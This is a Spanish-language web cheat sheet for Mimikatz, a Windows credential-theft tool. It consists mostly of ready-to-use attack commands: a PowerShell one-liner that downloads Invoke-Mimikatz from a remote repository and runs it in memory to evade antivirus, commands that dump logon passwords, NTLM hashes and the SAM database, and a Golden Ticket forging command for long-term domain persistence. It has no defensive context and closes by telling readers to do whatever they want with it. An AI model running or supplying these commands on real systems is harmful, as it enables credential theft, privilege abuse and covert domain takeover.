Skip to content

Mimikatz

La navaja suiza para la seguridad de Windows. Permite extraer credenciales en texto plano, hashes, tickets Kerberos y más desde la memoria.

Requiere Privilegios

Necesitas ser Administrador o SYSTEM para ejecutar la mayoría de comandos.

⚡ One-Liners (PowerShell)

Cargar Mimikatz directamente en memoria (sin tocar disco para evadir AV básico).

powershell
# Cargar desde repositorio remoto (Invoke-Mimikatz)
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

💻 Comandos Interactivos

Ejecuta mimikatz.exe y usa estos comandos:

1. Elevar Privilegios (Debug)

Necesario antes de volcar credenciales.

cmd
privilege::debug

Salida esperada: Privilege '20' OK

2. Volcar Credenciales (LogonPasswords)

Extrae usuarios y contraseñas (si wdigest está activo) o hashes NTLM.

cmd
sekurlsa::logonpasswords

3. Volcar SAM (Base de datos local)

Obtiene hashes NTLM de usuarios locales.

cmd
lsadump::sam

4. Golden Ticket (Persistencia Total)

Si tienes el hash KRBTGT, puedes crear un ticket válido por 10 años.

cmd
kerberos::golden /user:Administrator /domain:dominio.local /sid:<SID> /krbtgt:<HASH> /id:500

Sin copyright ni nada. Ház lo que quieras con todo esto.